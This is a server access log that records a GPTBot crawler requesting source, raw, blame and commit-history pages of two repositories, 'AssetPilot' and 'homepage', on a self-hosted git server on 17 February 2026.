"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" +[17/Feb/2026:13:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16635] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" +[17/Feb/2026:13:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13367] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" +[17/Feb/2026:13:43:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15304] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" +[17/Feb/2026:13:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" [Client 74.7.227.38] [Length 10107] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app" +[17/Feb/2026:13:43:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app" +[17/Feb/2026:13:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11549] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11542] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 3] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11542] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11535] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11537] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15542] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:43:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9959] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9463] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 277] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 257] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:43:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" [Client 74.7.227.38] [Length 9957] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/lib64" +[17/Feb/2026:13:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 10114] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 10422] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10419] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10420] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10426] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9947] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" [Client 74.7.227.38] [Length 11516] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 9948] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" +[17/Feb/2026:13:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 15821] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" +[17/Feb/2026:13:43:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11124] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/docker-compose.yml" +[17/Feb/2026:13:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11896] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup" +[17/Feb/2026:13:43:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 11510] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:43:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" [Client 74.7.227.38] [Length 11510] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:13:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python" [Client 74.7.227.38] [Length 11031] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" +[17/Feb/2026:13:43:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11521] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin" 